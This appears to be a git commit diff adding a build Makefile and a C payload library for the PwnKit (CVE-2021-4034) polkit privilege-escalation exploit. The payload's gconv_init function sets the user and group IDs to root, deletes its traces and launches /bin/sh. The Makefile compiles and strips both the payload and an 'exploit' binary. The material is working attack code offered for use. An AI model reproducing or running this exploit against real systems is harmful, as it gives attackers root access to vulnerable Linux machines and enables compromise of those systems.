parent
0e48795ab0
commit
d63e5435ff
@ -0,0 +1,21 @@ |
||||
define do_strip |
||||
strip -R ".jcr" \ |
||||
-R ".comment" \
|
||||
-R ".eh_frame" \
|
||||
-R ".eh_frame_hdr" \
|
||||
-R ".note.gnu.build-id" \
|
||||
--strip-debug \
|
||||
--strip-unneeded $(1)
|
||||
endef |
||||
|
||||
exploit: FORCE |
||||
gcc pwnkit.c -o pwnkit.so -shared -fPIC
|
||||
@$(call do_strip,pwnkit.so)
|
||||
xxd -i pwnkit.so >pwnkit.so.inc
|
||||
gcc cve-2021-4034-poc.c -o exploit
|
||||
@$(call do_strip,exploit)
|
||||
|
||||
clean: |
||||
rm -f pwnkit.so pwnkit.so.inc exploit
|
||||
|
||||
FORCE: |
@ -0,0 +1,11 @@ |
||||
#include <stdio.h> |
||||
#include <stdlib.h> |
||||
#include <unistd.h> |
||||
|
||||
void gconv() {} |
||||
void gconv_init() { |
||||
setuid(0); setgid(0); |
||||
seteuid(0); setegid(0); |
||||
system("export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; rm -rf 'GCONV_PATH=.' 'pwnkit'; /bin/sh"); |
||||
exit(0); |
||||
}; |
Loading…
Reference in new issue